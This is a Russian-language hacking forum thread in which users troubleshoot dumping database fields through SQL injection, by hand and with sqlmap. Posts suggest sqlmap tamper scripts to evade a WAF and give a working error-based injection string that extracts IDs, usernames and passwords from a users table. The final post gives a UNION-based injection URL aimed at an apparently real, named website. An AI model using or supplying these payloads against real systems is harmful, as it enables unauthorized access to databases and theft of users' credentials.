Mysql/SQLMap не выводят данные поля

Discussion in 'Песочница' started by nopony, 24 Aug 2015.

  1. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    8
    Likes Received:
    3
    Reputations:
    8
    Здравствуйте,такая проблема,из таблицы выводятся данные,но не все,которые мне нужны т.е. допустим email я вывести могу,а password нет,подскажите,с чем это связано? Не в первый раз уже такое замечаю. Причём без разницы как я пытаюсь вывести,прямым запросом или через sqlmap,результат один. Вывожу из бд,в которой я нахожусь в данный момент+если email выводится,то по идее доступ к таблице есть,или же можно как то ограничить доступ к полю?
     
  2. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    можно, через GRANT
    думаю что при грамотном разграничении доступа к полям можно усложнить жизнь атакующим, тоесть например если ты даже найдёш sql инъекцию в скрипте news.php то не сможеш прочитать поле password т.к. в скрипте news.php незачем обращаться к полю password и доступ к нему ограничен, обращаться к данному полю например можно только из скрипта login.php и следовательно чтобы прочитать поле password нужно искать sqlinj в скрипте login.php. Но на практике лично я такого разграничения почти нигде не встречал
    А вообще можете подключить tamper скрипты в sqlmap и попробовать прочитать поле с их помощью, мож там waf какой-нибудь стоит
     
    #2 private_static, 24 Aug 2015
    Last edited: 1 Oct 2015
    nopony likes this.
  3. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    8
    Likes Received:
    3
    Reputations:
    8
    WAFа нету,count(password) выполняется,так что похоже всё таки ограничение на скрипт,спасибо
     
  4. Axiomatic

    Axiomatic New Member

    Joined:
    27 Mar 2014
    Messages:
    40
    Likes Received:
    3
    Reputations:
    0
  5. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    8
    Likes Received:
    3
    Reputations:
    8
    Не знаю как насчёт sqlmap(а),но этот сайт руками дампится "67' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,ID,user,password) from users limit 0,1))) or 1='1" (без "),а вот мой сайт не дампится ни руками ни sqlmapом
     
  6. Axiomatic

    Axiomatic New Member

    Joined:
    27 Mar 2014
    Messages:
    40
    Likes Received:
    3
    Reputations:
    0
    оО , спасибо ! запрос "67' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x3b,ID,user,password) from users limit 0,1))) or 1='1"
    стандартен на подобного вида ошибку или индивидуально подбирается для каждого сайта ?
     
  7. nopony

    nopony New Member

    Joined:
    29 Aug 2013
    Messages:
    8
    Likes Received:
    3
    Reputations:
    8
    Выделенная часть-стандартна,а остальное для уравновешивания ковычек
     
  8. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Понятия не имею как работает sqlmap бо никогда им не пользовался, но, скорее всего, проблема заключается в том, что там используется 2 sql запроса и если хотя бы один из них возвращает ошибку, то софтина считает, что запрос не удался.

    И да, error based в данном случае излишен.
    Code:
    http://www.sedimental.com/catalog/index.php?ID=-67' union select 1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15,16,17 -- 1
     
Loading...